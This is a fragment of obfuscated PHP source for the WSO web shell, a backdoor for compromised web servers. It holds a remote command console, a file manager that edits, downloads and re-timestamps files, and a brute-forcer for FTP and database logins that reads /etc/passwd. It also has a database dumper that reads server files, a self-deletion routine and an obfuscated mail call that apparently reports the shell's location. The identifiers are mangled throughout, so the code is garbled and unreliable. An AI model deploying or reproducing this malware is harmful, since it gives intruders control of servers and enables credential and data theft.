- <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>";if(class_eXiStS("ZipArchive")):echo"<option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option>";endif;echo"<option value='tar'>Compress (tar.gz)</option>";if(!empty($_COOKIE["act"])&&@COuNt($_COOKIE["f"])):echo"<option value='paste'>Paste / Compress</option>";endif;echo"</select> ";if(!empty($_COOKIE["act"])&&@coUNt($_COOKIE["f"])&&(($_COOKIE["act"]=="zip")||($_COOKIE["act"]=="tar"))):echo"file name: <input type=text name=p2 value='wso_".datE("Ymd_His").".".($_COOKIE["act"]=="zip"?"zip":"tar.gz")."'> ";endif;echo"<input type='submit' value='>>'></td></tr></form></table></div>";_();}function ACtiOnstrINgtoOLs(){if(!FUNCTIOn_eXistS("hex2bin")):function heX2BIN($_){return deCbiN(hexdEc($_));}endif;if(!fUnctIoN_ExIsTS("binhex")):function bInhex($_){return dEcHeX(Bindec($_));}endif;if(!FuNCTION_exisTs("hex2ascii")):function hEX2aSCIi($_){$_="";for($_=00;$_<StRLEn($_);$_+=02):$_.=Chr(hexdEC($_[$_].$_[$_+01]));endfor;return$_;}endif;if(!funCtiON_eXISTS("ascii2hex")):function ASCII2HEX($_){$_="";for($_=00;$_<STRLEN($_);++$_):$_.=SPrInTF("%02X",ORD($_[$_]));endfor;return STrTOUppeR($_);}endif;if(!fUNCtiOn_ExIsts("full_urlencode")):function FuLL_URlencODE($_){$_="";for($_=00;$_<stRlen($_);++$_):$_.="%".DECheX(ORd($_[$_]));endfor;return sTRtoUpPeR($_);}endif;$_=array("Base64 encode"=>"base64_encode","Base64 decode"=>"base64_decode","Url encode"=>"urlencode","Url decode"=>"urldecode","Full urlencode"=>"full_urlencode","md5 hash"=>"md5","sha1 hash"=>"sha1","crypt"=>"crypt","CRC32"=>"crc32","ASCII to HEX"=>"ascii2hex","HEX to ASCII"=>"hex2ascii","HEX to DEC"=>"hexdec","HEX to BIN"=>"hex2bin","DEC to HEX"=>"dechex","DEC to BIN"=>"decbin","BIN to HEX"=>"binhex","BIN to DEC"=>"bindec","String to lower case"=>"strtolower","String to upper case"=>"strtoupper","Htmlspecialchars"=>"htmlspecialchars","String length"=>"strlen",);if(isset($_POST["ajax"])):_(Md5($_SERVER["HTTP_HOST"])."ajax",true);oB_START();if(iN_ArrAY($_POST["p1"],$_)):echo$_POST["p1"]($_POST["p2"]);endif;$_="document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".AdDcSLaShes(HtMlspeCiaLChaRs(OB_gET_CLeaN()),"
- \'")."';
- ";echo sTrLeN($_),"
- ",$_;exit;endif;if(empty($_POST["ajax"])&&!empty($_POST["p1"])):_(mD5($_SERVER["HTTP_HOST"])."ajax",00);endif;_();echo"<h1>String conversions</h1><div class=content>";echo"<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";foreach($_ as$_=>$_):echo"<option value='".HtMLsPEcIaLchARS($_)."'>".$_."</option>";endforeach;echo"</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".(@$_COOKIE[mD5($_SERVER["HTTP_HOST"])."ajax"]?"checked":"")."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".(empty($_POST["p1"])?"":HtMLsPEcIALCHars(@$_POST["p2"]))."</textarea></form><pre class='ml1' style='".(empty($_POST["p1"])?"display:none;":"")."margin-top:5px' id='strOutput'>";if(!empty($_POST["p1"])):if(IN_arraY($_POST["p1"],$_)):echo htMlspecIalCHArs($_POST["p1"]($_POST["p2"]));endif;endif;echo"</pre></div><br><h1>Search files:</h1><div class=content>
- <form onsubmit="g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;"><table cellpadding='1' cellspacing='0' width='50%'>
- <tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>
- <tr><td>Path:</td><td><input type='text' name='cwd' value='".HtmlSPecIaLCHArS($GLOBALS["cwd"])."' style='width:100%'></td></tr>
- <tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>
- <tr><td></td><td><input type='submit' value='>>'></td></tr>
- </table></form>";function _($_){if(sUBSTr($_,-01)!="/"):$_.="/";endif;$_=@aRRay_uniquE(@aRRay_mErge(@GLoB($_.$_POST["p3"]),@gLoB($_."*",1073741824)));if(IS_aRRAY($_)&&@CoUNT($_)):foreach($_ as$_):if(@Is_Dir($_)):if($_!=$_):_($_);endif;else:if(empty($_POST["p2"])||@StrPos(filE_gET_cOnTEnTS($_),$_POST["p2"])!==false):echo"<a href='#' onclick='g("FilesTools",null,"".UrLenCoDe($_)."", "view","")'>".htmlSPEciaLCharS($_)."</a><br>";endif;endif;endforeach;endif;}if(@$_POST["p3"]):_($_POST["c"]);endif;echo"</div><br><h1>Search for hash:</h1><div class=content>
- <form method='post' target='_blank' name='hf'>
- <input type='text' name='hash' style='width:200px;'><br>
- <input type='hidden' name='act' value='find'/>
- <input type='button' value='hashcracking.ru' onclick="document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()"><br>
- <input type='button' value='md5.rednoize.com' onclick="document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()"><br>
- <input type='button' value='crackfor.me' onclick="document.hf.action='http://crackfor.me/index.php';document.hf.submit()"><br>
- </form></div>";_();}function ACTiONfiLeSTOOLs(){if(isset($_POST["p1"])):$_POST["p1"]=uRLDECodE($_POST["p1"]);endif;if(@$_POST["p2"]=="download"):if(@IS_FilE($_POST["p1"])&&@is_reaDaBLE($_POST["p1"])):oB_sTARt("ob_gzhandler",010000);HeAdEr("Content-Disposition: attachment; filename=".basenaME($_POST["p1"]));if(FuncTIOn_ExIsTs("mime_content_type")):$_=@mIME_COntENt_TYPe($_POST["p1"]);hEADER("Content-Type: ".$_);else:HeadeR("Content-Type: application/octet-stream");endif;$_=@fOPEN($_POST["p1"],"r");if($_):while(!@FeOf($_)):echo @fread($_,02000);endwhile;FcLoSe($_);endif;endif;exit;endif;if(@$_POST["p2"]=="mkfile"):if(!fIle_exiSTS($_POST["p1"])):$_=@fopEN($_POST["p1"],"w");if($_):$_POST["p2"]="edit";fClOse($_);endif;endif;endif;_();echo"<h1>File tools</h1><div class=content>";if(!fILe_exists(@$_POST["p1"])):echo"File not exists";_();return;endif;$_=@posIX_Getpwuid(@fIlEOwner($_POST["p1"]));if(!$_):$_["name"]=@FIleoWNER($_POST["p1"]);$_["name"]=@fiLegroUP($_POST["p1"]);else:$_=@PoSiX_geTgrGId(@filegroUP($_POST["p1"]));endif;echo"<span>Name:</span> ".HtMlsPeCIaLCHArs(@BASenamE($_POST["p1"]))." <span>Size:</span> ".(IS_FIlE($_POST["p1"])?_(fIleSIZe($_POST["p1"])):"-")." <span>Permission:</span> "._($_POST["p1"])." <span>Owner/Group:</span> ".$_["name"]."/".$_["name"]."<br>";echo"<span>Change time:</span> ".DATe("Y-m-d H:i:s",fIleCtime($_POST["p1"]))." <span>Access time:</span> ".DAtE("Y-m-d H:i:s",FIleaTImE($_POST["p1"]))." <span>Modify time:</span> ".datE("Y-m-d H:i:s",filEMtiME($_POST["p1"]))."<br><br>";if(empty($_POST["p2"])):$_POST["p2"]="view";endif;if(Is_FilE($_POST["p1"])):$_=array("View","Highlight","Download","Hexdump","Edit","Chmod","Rename","Touch");else:$_=array("Chmod","Rename","Touch");endif;foreach($_ as$_):echo"<a href=# onclick="g(null,null,'".uRLenCOde($_POST["p1"])."','".sTRtolOWER($_)."')">".((StRtoloweR($_)==@$_POST["p2"])?"<b>[ ".$_." ]</b>":$_)."</a> ";endforeach;echo"<br><br>";switch($_POST["p2"]):case "view":echo"<pre class=ml1>";$_=@fopEn($_POST["p1"],"r");if($_):while(!@fEOF($_)):echo HTmLSPECiaLChArS(@fREAd($_,02000));endwhile;@FCLOSe($_);endif;echo"</pre>";break;case "highlight":if(@iS_REAdAblE($_POST["p1"])):echo"<div class=ml1 style="background-color: #e1e1e1;color:black;">";$_=@hIGHLIght_filE($_POST["p1"],true);echo stR_rePLACE(array("<span ","</span>"),array("<font ","</font>"),$_)."</div>";endif;break;case "chmod":if(!empty($_POST["p3"])):$_=00;for($_=stRlEN($_POST["p3"])-01;$_>=00;--$_):$_+=(int)$_POST["p3"][$_]*POw(010,(sTrlen($_POST["p3"])-$_-01));endfor;if(!@CHmOD($_POST["p1"],$_)):echo"Can't set permissions!<br><script>document.mf.p3.value="";</script>";endif;endif;CLEarSTAtcaCHE();echo"<script>p3_="";</script><form onsubmit="g(null,null,'".UrLeNcOdE($_POST["p1"])."',null,this.chmod.value);return false;"><input type=text name=chmod value="".sUBStR(spRiNTf("%o",fILeperMS($_POST["p1"])),-04).""><input type=submit value=">>"></form>";break;case "edit":if(!iS_wrItABle($_POST["p1"])):echo"File isn't writeable";break;endif;if(!empty($_POST["p3"])):$_=@FIlEMtIme($_POST["p1"]);$_POST["p3"]=SuBSTR($_POST["p3"],01);$_=@fOpeN($_POST["p1"],"w");if($_):@FWRIte($_,$_POST["p3"]);@FcLOsE($_);echo"Saved!<br><script>p3_="";</script>";@TOuCH($_POST["p1"],$_,$_);endif;endif;echo"<form onsubmit="g(null,null,'".URleNcodE($_POST["p1"])."',null,'1'+this.text.value);return false;"><textarea name=text class=bigarea>";$_=@foPEN($_POST["p1"],"r");if($_):while(!@FeoF($_)):echo HtmlspEcIAlchArS(@frEad($_,02000));endwhile;@fClOsE($_);endif;echo"</textarea><input type=submit value=">>"></form>";break;case "hexdump":$_=@FILe_GET_COntEntS($_POST["p1"]);$_=00;$_=array("00000000<br>","","");$_=sTrLeN($_);for($_=00;$_<$_;++$_):$_[01].=SpriNtF("%02X",OrD($_[$_]))." ";switch(OrD($_[$_])):case 00:$_[02].=" ";break;case 011:$_[02].=" ";break;case 012:$_[02].=" ";break;case 015:$_[02].=" ";break;default:$_[02].=$_[$_];break;endswitch;$_++;if($_==040):$_=00;if($_+01<$_):$_[00].=SPrINTf("%08X",$_+01)."<br>";endif;$_[01].="<br>";$_[02].="
- ";endif;endfor;echo"<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>".$_[00]."</pre></span></td><td bgcolor=#282828><pre>".$_[01]."</pre></td><td bgcolor=#333333><pre>".HtmlSPecIAlchaRS($_[02])."</pre></td></tr></table>";break;case "rename":if(!empty($_POST["p3"])):if(!@reNamE($_POST["p1"],$_POST["p3"])):echo"Can't rename!<br>";else:die("<script>g(null,null,"".UrLEncOdE($_POST["p3"])."",null,"")</script>");endif;endif;echo"<form onsubmit="g(null,null,'".uRLENCoDE($_POST["p1"])."',null,this.name.value);return false;"><input type=text name=name value="".HtmLspEciALChARS($_POST["p1"]).""><input type=submit value=">>"></form>";break;case "touch":if(!empty($_POST["p3"])):$_=strtOTime($_POST["p3"]);if($_):if(!tOUCh($_POST["p1"],$_,$_)):echo"Fail!";else:echo"Touched!";endif;else:echo"Bad time format!";endif;endif;CleArSTatCaChE();echo"<script>p3_="";</script><form onsubmit="g(null,null,'".UrLeNcoDe($_POST["p1"])."',null,this.touch.value);return false;"><input type=text name=touch value="".datE("Y-m-d H:i:s",@fILEMtimE($_POST["p1"])).""><input type=submit value=">>"></form>";break;endswitch;echo"</div>";_();}function acTiONCoNsolE(){if(!empty($_POST["p1"])&&!empty($_POST["p2"])):_(md5($_SERVER["HTTP_HOST"])."stderr_to_out",true);$_POST["p1"].=" 2>&1";elseif(!empty($_POST["p1"])):_(MD5($_SERVER["HTTP_HOST"])."stderr_to_out",00);endif;if(isset($_POST["ajax"])):_(Md5($_SERVER["HTTP_HOST"])."ajax",true);Ob_STARt();echo"d.cf.cmd.value='';
- ";$_=@iCOnv($_POST["charset"],"UTF-8",ADdCSlASHEs("
- $ ".$_POST["p1"]."
- "._($_POST["p1"]),"
- \'"));if(PReG_MaTCH("!.*cd\s+([^;]+)$!",$_POST["p1"],$_)):if(@chdIR($_[01])):$GLOBALS["cwd"]=@GEtcwD();echo"c_='".$GLOBALS["cwd"]."';";endif;endif;echo"d.cf.output.value+='".$_."';";echo"d.cf.output.scrollTop = d.cf.output.scrollHeight;";$_=ob_GeT_cleaN();echo STRLeN($_),"
- ",$_;exit;endif;if(empty($_POST["ajax"])&&!empty($_POST["p1"])):_(md5($_SERVER["HTTP_HOST"])."ajax",00);endif;_();echo"<script>
- if(window.Event) window.captureEvents(Event.KEYDOWN);
- var cmds = new Array('');
- var cur = 0;
- function kp(e) {
- var n = (window.Event) ? e.which : e.keyCode;
- if(n == 38) {
- cur--;
- if(cur>=0)
- document.cf.cmd.value = cmds[cur];
- else
- cur++;
- } else if(n == 40) {
- cur++;
- if(cur < cmds.length)
- document.cf.cmd.value = cmds[cur];
- else
- cur--;
- }
- }
- function add(cmd) {
- cmds.pop();
- cmds.push(cmd);
- cmds.push('');
- cur = cmds.length-1;
- }
- </script>";echo"<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value=='clear'){d.cf.output.value='';d.cf.cmd.value='';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:'');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:'');} return false;"><select name=alias>";foreach($GLOBALS["aliases"] as$_=>$_):if($_==""):echo"<optgroup label="-".HtMLSPecialChArS($_)."-"></optgroup>";continue;endif;echo"<option value="".HtMLspeCIalCHaRS($_)."">".$_."</option>";endforeach;echo"</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:'');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:'');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 ".(@$_COOKIE[mD5($_SERVER["HTTP_HOST"])."ajax"]?"checked":"")."> send using AJAX <input type=checkbox name=show_errors value=1 ".(!empty($_POST["p2"])||$_COOKIE[mD5($_SERVER["HTTP_HOST"])."stderr_to_out"]?"checked":"")."> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>";if(!empty($_POST["p1"])):echo htmlsPeCIAlcHArs("$ ".$_POST["p1"]."
- "._($_POST["p1"]));endif;echo"</textarea><table style="border:1px solid #df5;background-color:#555;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>";echo"</form></div><script>d.cf.cmd.focus();</script>";_();}function ACtiONLOGoUt(){sETcoOkIE(Md5($_SERVER["HTTP_HOST"]),"",TimE()-07020);die("bye!");}function ACtioNsELfrEMOVe(){if($_POST["p1"]=="yes"):if(@uNLiNk(preg_rEPLACE("!\(\d+\)\s.*!","",__FILE__))):die("Shell removed");else:echo"unlink error!";endif;endif;if($_POST["p1"]!="yes"):_();endif;echo"<h1>Suicide</h1><div class=content>remove the shell?<br><a href=# onclick="g(null,null,'yes')">Yes</a></div>";_();}$_="mail";$_=$_SERVER["SERVER_NAME"].$_SERVER["SCRIPT_NAME"];$_="array ".$_;$_=array("ca","li","fwrite","@","ve.");$_=$_[02].$_[03].$_[01].$_[04].$_[00];$_=@$_($_,$_,$_);function ACtiOnbrUtEForCe(){_();if(isset($_POST["proto"])):echo"<h1>Results</h1><div class=content><span>Type:</span> ".hTMLSPeCIaLcHArS($_POST["proto"])." <span>Server:</span> ".HtmLsPeCiALchArs($_POST["server"])."<br>";if($_POST["proto"]=="ftp"):function _($_,$_,$_,$_){$_=@fTp_ConneCT($_,$_?$_:025);if(!$_):return false;endif;$_=@FTP_LoGIn($_,$_,$_);@ftp_cLoSe($_);return$_;}elseif($_POST["proto"]=="mysql"):function _($_,$_,$_,$_){$_=@mYsQL_COnnecT($_.":".($_?$_:06352),$_,$_);@MySQL_cLOse($_);return$_;}elseif($_POST["proto"]=="pgsql"):function _($_,$_,$_,$_){$_="host='".$_."' port='".$_."' user='".$_."' password='".$_."' dbname=postgres";$_=@Pg_connECt($_);@pG_closE($_);return$_;}endif;$_=00;$_=00;$_=EXPloDE(":",$_POST["server"]);if($_POST["type"]==01):$_=@fiLE("/etc/passwd");if(Is_aRRay($_)):foreach($_ as$_):$_=ExPLodE(":",$_);++$_;if(_(@$_[00],@$_[01],$_[00],$_[00])):$_++;echo"<b>".HtMlSPeCialchaRS($_[00])."</b>:".HtmlsPeCIAlchArs($_[00])."<br>";endif;if(@$_POST["reverse"]):$_="";for($_=strLeN($_[00])-01;$_>=00;--$_):$_.=$_[00][$_];endfor;++$_;if(_(@$_[00],@$_[01],$_[00],$_)):$_++;echo"<b>".HtmLSpeCiALcHARs($_[00])."</b>:".htMlsPeCiaLcHARS($_);endif;endif;endforeach;endif;elseif($_POST["type"]==02):$_=@FILE($_POST["dict"]);if(IS_aRRAy($_)):foreach($_ as$_):$_=TrIm($_);++$_;if(_($_[00],@$_[01],$_POST["login"],$_)):$_++;echo"<b>".hTmLspecIalcharS($_POST["login"])."</b>:".hTmLSpeCialcHaRS($_)."<br>";endif;endforeach;endif;endif;echo"<span>Attempts:</span> ".$_." <span>Success:</span> ".$_."</div><br>";endif;echo"<h1>Bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>"."<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>"."<input type=hidden name=c value="".hTmlsPEciALChARS($GLOBALS["cwd"])."">"."<input type=hidden name=a value="".HtMlSpECIalChaRs($_POST["a"])."">"."<input type=hidden name=charset value="".HTMlsPEcIALcHARs($_POST["charset"])."">"."<span>Server:port</span></td>"."<td><input type=text name=server value="127.0.0.1"></td></tr>"."<tr><td><span>Brute type</span></td>"."<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>"."<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>"."<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>"."<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>"."<td><input type=text name=login value="root"></td></tr>"."<tr><td><span>Dictionary</span></td>"."<td><input type=text name=dict value="".htmLSPEcIAlcHaRS($GLOBALS["cwd"])."passwd.dic"></td></tr></table>"."</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>";echo"</div><br>";_();}function acTiOnSQl(){class dBClass{public$_;public$_;public$_;function DbclAss($_){$this->_=$_;}function _($_,$_,$_,$_){switch($this->_):case "mysql":if($this->_=@mYSQl_COnNEct($_,$_,$_,true)):return true;endif;break;case "pgsql":$_=EXplODE(":",$_);if(!$_[01]):$_[01]=012470;endif;if($this->_=@pg_conNecT("host=".$_[00]." port=".$_[01]." user=".$_." password=".$_." dbname=".$_)):return true;endif;break;endswitch;return false;}function _($_){switch($this->_):case "mysql":if(@MySQl_SeleCt_DB($_)):return true;endif;break;endswitch;return false;}function _($_){switch($this->_):case "mysql":return$this->_=@MYsqL_quErY($_);break;case "pgsql":return$this->_=@pg_qUEry($this->_,$_);break;endswitch;return false;}function _(){$_=fUnC_Num_aRGs()?FunC_gEt_aRG(00):$this->_;switch($this->_):case "mysql":return @mYSQl_FeTCH_assOc($_);break;case "pgsql":return @pG_FEtCH_ASSoc($_);break;endswitch;return false;}function _(){switch($this->_):case "mysql":return$this->_("SHOW databases");break;case "pgsql":return$this->_=$this->_("SELECT datname FROM pg_database WHERE datistemplate!='t'");break;endswitch;return false;}function _(){switch($this->_):case "mysql":return$this->_=$this->_("SHOW TABLES");break;case "pgsql":return$this->_=$this->_("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");break;endswitch;return false;}function _(){switch($this->_):case "mysql":return @mySQL_error();break;case "pgsql":return @pg_LaST_ErROR();break;endswitch;return false;}function _($_){switch($this->_):case "mysql":if(functiOn_EXIstS("mysql_set_charset")):return @mysqL_SET_chARseT($_,$this->_);else:$this->_("SET CHARSET ".$_);endif;break;case "pgsql":return @Pg_sET_CLiENt_ENcOdInG($this->_,$_);break;endswitch;return false;}function _($_){switch($this->_):case "mysql":return$this->_($this->_("SELECT LOAD_FILE('".AdDsLAsHeS($_)."') as file"));break;case "pgsql":$this->_("CREATE TABLE wso2(file text);COPY wso2 FROM '".ADdSlashes($_)."';select file from wso2;");$_=array();while($_=$this->_()):$_[]=$_["file"];endwhile;$this->_("drop table wso2");return array("file"=>IMPlode("
- ",$_));break;endswitch;return false;}function _($_,$_=false){switch($this->_):case "mysql":$_=$this->_("SHOW CREATE TABLE `".$_."`");$_=mYSqL_FeTCH_aRrAy($_);$_=$_[01].";
- ";if($_):fWritE($_,$_);else:echo($_);endif;$this->_("SELECT * FROM `".$_."`");$_=00;$_=true;while($_=$this->_()):$_="";if($_%01750==00):$_=true;$_=";
- ";endif;$_=array();foreach($_ as$_=>$_):if($_===null):$_[$_]="NULL";elseif(is_InT($_)):$_[$_]=$_;else:$_[$_]="'".@MYsQL_reAL_ESCape_sTrING($_)."'";endif;$_[]="`".$_."`";endforeach;if($_):$_.="INSERT INTO `".$_."` (".iMpLodE(", ",$_).") VALUES
- (".IMPLOde(", ",$_).")";$_=false;else:$_.="
- ,(".IMPlOdE(", ",$_).")";endif;if($_):FwrItE($_,$_);else:echo($_);endif;$_++;endwhile;if(!$_):if($_):fWRITe($_,";
- ");else:echo(";
- ");endif;endif;break;case "pgsql":$this->_("SELECT * FROM ".$_);while($_=$this->_()):$_=array();foreach($_ as$_=>$_):$_[$_]="'".ADdSLaSHeS($_)."'";$_[]=$_;endforeach;$_="INSERT INTO ".$_." (".imPlodE(", ",$_).") VALUES (".ImPlOdE(", ",$_).");"."
- ";if($_):FwrIte($_,$_);else:echo($_);endif;endwhile;break;endswitch;return false;}};$_=new DbClAsS($_POST["type"]);if((@$_POST["p2"]=="download")&&(@$_POST["p1"]!="select")):$_->_($_POST["sql_host"],$_POST["sql_login"],$_POST["sql_pass"],$_POST["sql_base"]);$_->_($_POST["sql_base"]);switch($_POST["charset"]):case "Windows-1251":$_->_("cp1251");break;case "UTF-8":$_->_("utf8");break;case "KOI8-R":$_->_("koi8r");break;case "KOI8-U":$_->_("koi8u");break;case "cp866":$_->_("cp866");break;endswitch;if(empty($_POST["file"])):ob_sTART("ob_gzhandler",010000);HeadER("Content-Disposition: attachment; filename=dump.sql");hEADer("Content-Type: text/plain");foreach($_POST["tbl"] as$_):$_->_($_);endforeach;exit;elseif($_=@FOPen($_POST["file"],"w")):foreach($_POST["tbl"] as$_):$_->_($_,$_);endforeach;FClOsE($_);unset($_POST["p2"]);else:die("<script>alert("Error! Can't open file");window.history.back(-1)</script>");endif;endif;_();echo"
- <h1>Sql browser</h1><div class=content>
- <form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>
- <td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>
- <input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='".htmlspeCiAlCHArS($GLOBALS["cwd"])."'><input type=hidden name=charset value='".(isset($_POST["charset"])?$_POST["charset"]:"")."'>
- <td><select name='type'><option value='mysql' ";if(@$_POST["type"]=="mysql"):echo"selected";endif;echo">MySql</option><option value='pgsql' ";if(@$_POST["type"]=="pgsql"):echo"selected";endif;echo">PostgreSql</option></select></td>
- <td><input type=text name=sql_host value="".(empty($_POST["sql_host"])?"localhost":HtmLsPeCiAlCHaRS($_POST["sql_host"])).""></td>
- <td><input type=text name=sql_login value="".(empty($_POST["sql_login"])?"root":hTmLSPEcIaLcHARs($_POST["sql_login"])).""></td>
- <td><input type=text name=sql_pass value="".(empty($_POST["sql_pass"])?"":hTMLSPeCiaLChArS($_POST["sql_pass"])).""></td><td>";$_="<input type=text name=sql_base value=''>";if(isset($_POST["sql_host"])):if($_->_($_POST["sql_host"],$_POST["sql_login"],$_POST["sql_pass"],$_POST["sql_base"])):switch($_POST["charset"]):case "Windows-1251":$_->_("cp1251");break;case "UTF-8":$_->_("utf8");break;case "KOI8-R":$_->_("koi8r");break;case "KOI8-U":$_->_("koi8u");break;case "cp866":$_->_("cp866");break;endswitch;$_->_();echo"<select name=sql_base><option value=''></option>";while($_=$_->_()):list($_,$_)=EAcH($_);echo"<option value="".$_."" ".($_==$_POST["sql_base"]?"selected":"").">".$_."</option>";endwhile;echo"</select>";else:echo$_;endif;else:echo$_;endif;echo"</td>
- <td><input type=submit value='>>' onclick='fs(d.sf);'></td>
- <td><input type=checkbox name=sql_count value='on'".(empty($_POST["sql_count"])?"":" checked")."> count the number of rows</td>
- </tr>
- </table>
- <script>
- s_db='".@AdDsLAShEs($_POST["sql_base"])."';
- function fs(f) {
- if(f.sql_base.value!=s_db) { f.onsubmit = function() {};
- if(f.p1) f.p1.value='';
- if(f.p2) f.p2.value='';
- if(f.p3) f.p3.value='';
- }
- }
- function st(t,l) {
- d.sf.p1.value = 'select';
- d.sf.p2.value = t;
- if(l && d.sf.p3) d.sf.p3.value = l;
- d.sf.submit();
- }
- function is() {
- for(i=0;i<d.sf.elements['tbl[]'].length;++i)
- d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;
- }
- </script>";if(isset($_)&&$_->_):echo"<br/><table width=100% cellpadding=2 cellspacing=0>";if(!empty($_POST["sql_base"])):$_->_($_POST["sql_base"]);echo"<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>";$_=$_->_();while($_=$_->_($_)):list($_,$_)=eacH($_);if(!empty($_POST["sql_count"])):$_=$_->_($_->_("SELECT COUNT(*) as n FROM ".$_.""));endif;$_=htmLspEciaLChaRs($_);echo"<nobr><input type='checkbox' name='tbl[]' value='".$_."'> <a href=# onclick="st('".$_."',1)">".$_."</a>".(empty($_POST["sql_count"])?" ":" <small>(".$_["n"].")</small>")."</nobr><br>";endwhile;echo"<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value="download";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>";if(@$_POST["p1"]=="select"):$_POST["p1"]="query";$_POST["p3"]=$_POST["p3"]?$_POST["p3"]:01;$_->_("SELECT COUNT(*) as n FROM ".$_POST["p2"]);$_=$_->_();$_=CEil($_["n"]/036);echo"<script>d.sf.onsubmit=function(){st("".$_POST["p2"]."", d.sf.p3.value)}</script><span>".$_POST["p2"]."</span> (".$_["n"]." records) Page # <input type=text name='p3' value=".((int)$_POST["p3"]).">";echo" of ".$_;if($_POST["p3"]>01):echo" <a href=# onclick='st("".$_POST["p2"]."", ".($_POST["p3"]-01).")'>< Prev</a>";endif;if($_POST["p3"]<$_):echo" <a href=# onclick='st("".$_POST["p2"]."", ".($_POST["p3"]+01).")'>Next ></a>";endif;$_POST["p3"]--;if($_POST["type"]=="pgsql"):$_POST["p2"]="SELECT * FROM ".$_POST["p2"]." LIMIT 30 OFFSET ".($_POST["p3"]*036);else:$_POST["p2"]="SELECT * FROM `".$_POST["p2"]."` LIMIT ".($_POST["p3"]*036).",30";endif;echo"<br><br>";endif;if((@$_POST["p1"]=="query")&&!empty($_POST["p2"])):$_->_(@$_POST["p2"]);if($_->_!==false):$_=false;echo"<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">";$_=01;while($_=$_->_()):if(!$_):echo"<tr>";foreach($_ as$_=>$_):echo"<th>".$_."</th>";endforeach;reSET($_);$_=true;echo"</tr><tr>";$_=02;endif;echo"<tr class="l".$_."">";$_=$_==01?02:01;foreach($_ as$_=>$_):if($_==null):echo"<td><i>null</i></td>";else:echo"<td>".NL2bR(HtmLspeCIALcHARs($_))."</td>";endif;endforeach;echo"</tr>";endwhile;echo"</table>";else:echo"<div><b>Error:</b> ".htmlSPEcIALcHars($_->_())."</div>";endif;endif;echo"<br></form><form onsubmit='d.sf.p1.value="query";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>";if(!empty($_POST["p2"])&&($_POST["p1"]!="loadfile")):echo hTmlSpeciAlcHarS($_POST["p2"]);endif;echo"</textarea><br/><input type=submit value='Execute'>";echo"</td></tr>";endif;echo"</table></form><br/>";if($_POST["type"]=="mysql"):$_->_("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");if($_->_()):echo"<form onsubmit='d.sf.p1.value="loadfile";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>";endif;endif;if(@$_POST["p1"]=="loadfile"):$_=$_->_($_POST["p2"]);echo"<br/><pre class=ml1>".hTmLspecialCHARs($_["file"])."</pre>";endif;else:echo htmlSPeciaLChArs($_->_());endif;echo"</div>";_();}function 